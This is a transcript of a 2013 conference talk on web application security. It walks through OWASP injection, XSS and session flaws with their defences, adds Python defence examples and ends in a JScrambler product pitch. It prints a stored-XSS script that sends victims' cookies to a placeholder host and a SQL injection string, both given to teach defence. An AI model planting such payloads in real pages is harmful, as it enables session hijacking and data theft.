
Pedro Fortuna Co-founder and CTO


Presentation Transcript


  1. Protecting the code of Web Applications • Pedro Fortuna Co-founder and CTO ISEP, June 19th 2013

  2. Agenda

  3. +web NEXT Web Application Security

  4. Where things went wrong? Content delivery system: Web Browser → GET /index.html → Web Server → static text

  5. Where things went wrong? Content delivery system: Web Browser → GET /index.html → Web Server → static text. Application delivery system: Web Browser → GET /form.php?id=2&name=pedro%20fortuna → Web Server → DB → dynamically generated response

  6. Where things went wrong?
     • Users can submit arbitrary data to the server
     • This includes all non-obvious sources of data that can be used by the application (cookies, HTTP headers)
     • Data is mixed with all sorts of code (HTML, JavaScript, CSS, SQL)
     • Complex to filter, escape and output-encode data
     PHP string escaping:
       <?PHP $place = 'Peter's Pizza'; print $place; ?>
       becomes
       <?PHP $place = 'Peter\'s Pizza'; print $place; ?>
     HTML escaping:
       DB value "umafrasealeatória"
       becomes
       &quot;umafrasealeat&oacute;ria&quot;

  7. OWASP Top 10 2010 edition http://www.owasp.org/index.php/Top_10

  8. A1 - Injection

  9. SQL Injection - Illustrated
     Form fields: Account, SKU
     SQL query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
     1. Application presents a form to the attacker
     2. Attacker sends an attack in the form data (HTTP request)
     3. Application forwards attack to the database in a SQL query
     4. Database runs query containing attack and sends encrypted results back to application
     5. Application decrypts data as normal and sends results to the user (HTTP response)
     DB Table / Account Summary returned: Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
     (Diagram layers: Network Layer with Firewall, Hardened OS, Web Server, App Server, Application Layer with Custom Code; back ends: Databases, Legacy Systems, Web Services, Directories; business functions: Finance, Transactions, Accounts, Administration, Communication, Knowledge Mgmt, E-Commerce, Billing, Human Resrcs; labelled APPLICATION ATTACK)

  10. A1 – Avoiding Injection Flaws
     • Recommendations
       • Avoid the interpreter entirely, or
       • Use an interface that supports bind variables (e.g., prepared statements, or stored procedures); bind variables allow the interpreter to distinguish between code and data
       • Encode all user input before passing it to the interpreter
       • Always perform ‘white list’ input validation on all user supplied input
       • Always minimize database privileges to reduce the impact of a flaw
     • References
       • For more details, read http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
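An added example, not from the slides, showing the bind-variable and white-list advice of slide 10 against the query shape of slide 9, using Python's built-in sqlite3 with an in-memory table. The table rows, the function names and the account-number format are constructed for the illustration.

```python
import re
import sqlite3

# Constructed sample rows modelled on the slide's "accounts" table
ACCOUNTS = [
    ("5424-6066-2134-4334", "alice"),
    ("4128-7574-3921-0192", "bob"),
    ("5424-9383-2039-4029", "carol"),
]


def make_db():
    """In-memory SQLite database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (acct TEXT, owner TEXT)")
    con.executemany("INSERT INTO accounts VALUES (?, ?)", ACCOUNTS)
    return con


def lookup_concatenated(con, acct):
    """The flaw of slide 9: user data is spliced into the SQL text, so the
    interpreter cannot tell where the query ends and the data begins."""
    sql = "SELECT acct FROM accounts WHERE acct='" + acct + "'"
    return [row[0] for row in con.execute(sql)]


def lookup_bound(con, acct):
    """Bind variable (prepared statement): the SQL text is fixed and acct
    travels separately as a value, never as SQL syntax."""
    sql = "SELECT acct FROM accounts WHERE acct=?"
    return [row[0] for row in con.execute(sql, (acct,))]


# 'White list' validation (constructed rule): an account number is exactly
# four groups of four ASCII digits; anything else never reaches the database.
ACCT_FORMAT = re.compile(r"[0-9]{4}(?:-[0-9]{4}){3}")


def is_valid_acct(acct):
    return ACCT_FORMAT.fullmatch(acct) is not None


def lookup_defended(con, acct):
    """Both layers from slide 10: validate first, then query with a bind variable."""
    if not is_valid_acct(acct):
        raise ValueError("account number rejected by input validation")
    return lookup_bound(con, acct)
```

With the slide's own input `' OR 1=1--`, lookup_concatenated returns every row while lookup_bound returns none and lookup_defended refuses the request before any SQL runs.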

  11. A2 – Cross-Site Scripting (XSS)

  12. Cross-Site Scripting (XSS) Illustrated (application with stored XSS vulnerability)
     1. Attacker sets the trap – update my profile: attacker enters a malicious script into a web page that stores the data on the server, e.g. Hello my name is Peter <script> XSSImage=new Image; XSSImage.src="http://1.2.3.4/catcher?cookie="+document.cookie; </script>
     2. Victim views page – sees attacker profile: script runs inside victim’s browser with full access to the DOM and cookies
     3. Script silently sends attacker Victim’s session cookie
     (Diagram: Custom Code behind business functions Finance, Transactions, Accounts, Administration, Communication, Knowledge Mgmt, E-Commerce)

  13. A2 – Avoiding XSS flaws
     • Recommendations
       • Eliminate Flaw: don’t include user supplied input in the output page
       • Defend Against the Flaw
         • Primary Recommendation: Output encode all user supplied input (use OWASP’s ESAPI to output encode: http://www.owasp.org/index.php/ESAPI)
         • Perform ‘white list’ input validation on all user input to be included in page
         • For large chunks of user supplied HTML, use OWASP’s AntiSamy to sanitize this HTML to make it safe. See: http://www.owasp.org/index.php/AntiSamy
     • References
       • For how to output encode properly, read the new http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

  14. Safe Escaping Schemes in Various HTML Execution Contexts
     #1 HTML Element Content (e.g., <div> some text to display </div>): ( &, <, >, " ) → &entity; and ( ', / ) → &#xHH; ESAPI: encodeForHTML()
     #2 HTML Attribute Values (e.g., <input name='person' type='TEXT' value='defaultValue'>): all non-alphanumeric < 256 → &#xHH; ESAPI: encodeForHTMLAttribute()
     #3 JavaScript Data (e.g., <script> some javascript </script>): all non-alphanumeric < 256 → \xHH ESAPI: encodeForJavaScript()
     #4 CSS Style Property Values (e.g., .pdiv a:hover {color: red; text-decoration: underline}): all non-alphanumeric < 256 → \HH ESAPI: encodeForCSS()
     #5 URI Attribute Values (e.g., <a href="javascript:toggle('lesson')">): all non-alphanumeric < 256 → %HH ESAPI: encodeForURL()
     Recommendation: Only allow #1 and #2 and disallow all others
     See: www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet for more details
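An added example, not from the slides or from ESAPI, implementing the five context-specific encoders of this table in Python; the function names mirror the ESAPI ones but the code is constructed here. It goes a little beyond the slide's "< 256" rule by also escaping code points above 255 (with wider hex forms) and by terminating each CSS escape with a space so a hex digit that follows in the data cannot be absorbed into the escape.

```python
import re

_ASCII_ALNUM = re.compile(r"[A-Za-z0-9]")


def _escape_non_alnum(s, escape):
    """Contexts #2-#5 share one rule: ASCII letters and digits pass through,
    every other character is rewritten with the context's own escape syntax."""
    return "".join(c if _ASCII_ALNUM.fullmatch(c) else escape(c) for c in s)


def encode_for_html(s):
    """Context #1 (element content): the listed characters become entities,
    the two the slide singles out (' and /) as numeric &#xHH; forms."""
    table = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;",
             "'": "&#x27;", "/": "&#x2F;"}
    return "".join(table.get(c, c) for c in s)


def encode_for_html_attribute(s):
    """Context #2 (attribute value): &#xHH; with more hex digits above 255."""
    return _escape_non_alnum(s, lambda c: f"&#x{ord(c):02X};")


def encode_for_javascript(s):
    """Context #3 (JavaScript string data): \\xHH below 256, \\uHHHH above,
    since \\x can only carry one byte."""
    return _escape_non_alnum(
        s, lambda c: f"\\x{ord(c):02X}" if ord(c) < 256 else f"\\u{ord(c):04X}")


def encode_for_css(s):
    """Context #4 (CSS property value): \\HH followed by a space; the space is
    part of CSS escape syntax and stops a following hex digit being consumed."""
    return _escape_non_alnum(s, lambda c: f"\\{ord(c):02X} ")


def encode_for_url(s):
    """Context #5 (URL parameter value): %HH over the UTF-8 bytes of each
    character, so non-ASCII data round-trips through the URL."""
    return _escape_non_alnum(
        s, lambda c: "".join(f"%{b:02X}" for b in c.encode("utf-8")))
```

Picking the encoder by the context the data lands in is the whole point: the same string that is safe after encode_for_html in a <div> is not safe inside a <script> block or an href.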

  15. A3 – Broken Authentication and Session Management

  16. A3 – Broken Authentication Illustrated
     1. User sends credentials
     2. Site uses URL rewriting (i.e., put session in URL): www.foo.com?JSESSIONID=9FA1DB9EA...
     3. User clicks on a link to http://www.hacker.com in a forum
     4. Hacker checks referer logs on www.hacker.com and finds user’s JSESSIONID
     5. Hacker uses JSESSIONID and takes over victim’s account
     (Diagram: Custom Code behind business functions Finance, Transactions, Accounts, Administration, Communication, Knowledge Mgmt, E-Commerce)

  17. A3 – Avoiding Broken Authentication and Session Management
     • Verify your architecture
       • Authentication should be simple, centralized, and standardized
       • Use the standard session id provided by your framework (e.g. PHP Zend)
       • Be sure SSL protects both credentials and session id at all times
     • Verify the implementation
       • Check your SSL certificate
       • Examine all the authentication-related functions
       • Verify that logoff actually destroys the session
       • Make the session expire
       • Make the session unmovable (function(IP_ADDRESS))
     • Follow the guidance from http://www.owasp.org/index.php/Authentication_Cheat_Sheet

  18. +JS NEXT JScrambler

  19. Who we are?
     The Start: The Company started in late 2008, following the vision that software and data are migrating rapidly to the web, but security isn’t evolving at the same pace. Top Web Security Team, 30Y of combined experience. Being advised by Pereira Ventures in its International Expansion.
     Vision/Mission: Vision: we believe that the strongest approach to Web Security should be to put the 1st line of defense on the client-side. Mission: to be a leader in Web Application Protection technology.
     Awards: Innovative Web Security Solutions. Top 100 European Startup in 2009 in the European Unlimited Eurecan European Contest. Leaders in JavaScript Obfuscation since 2010.

  20. What do we do?
     • Web Traffic Auditing: Security Services
     • JavaScript Source code protection: Obfuscates JS/HTML5 WebApps; protects the code from being stolen, inspected, tampered with
     • Web Application Security: Enterprise Web Application Protection against Man in the Browser and other security attacks

  21. What is the world’s most popular language ?

  22. 3+ Years Protecting Apps
     Release History: 2010-04 Beta version; 2010-10 1.0 released; 2012-06 2.0 released; 2013-04 3.0 released
     +3 YEARS PROTECTING WEB APPLICATIONS: JS lines of code, Clients, Countries: 120, 5000, 106 MILLION PROTECTED

  23. JScrambler Feedback (Customer, Customer, News: RSA Security, Rovio, TechCrunch)
     "We are trying to push the envelope and it’s good to have a nimble partner that is aggressive at achieving this"
     "JScrambler does seem to offer the most complete solution. Out of the box, it should work with most of the standard libraries"
     "JScrambler results look promising"

  24. JScrambler: State of the art Web Application Protection and Optimization
     • JavaScript Obfuscation
     • JavaScript Code Execution Control: Domain Lock, Expiration Date, Anti-debugging
     • JavaScript Optimization: Code Simplification, Dead Code Removal, Compression
     For HTML5/JavaScript, Mobile Web Applications, Web Games

  25. JScrambler Obfuscation: The art of making code unreadable

  26. JScrambler Code Execution Control Domain Lock Expiration Date Anti Debugging

  27. NEXT JavaScript Obfuscation

  28. NEXT Questions. We look forward to your contact and feedback

  29. Contact Us: auditmark.com
     Pedro Fortuna, CTO: pedro.fortuna@auditmark.com, +351 917331552
     Lisbon Office: Rua da Prata 121 5º A, 1100-415 Lisboa, Portugal
     Porto Headquarters: Edifício Central da UPTEC, Rua Alfredo Allen, 455, 4200-135 Porto, Portugal
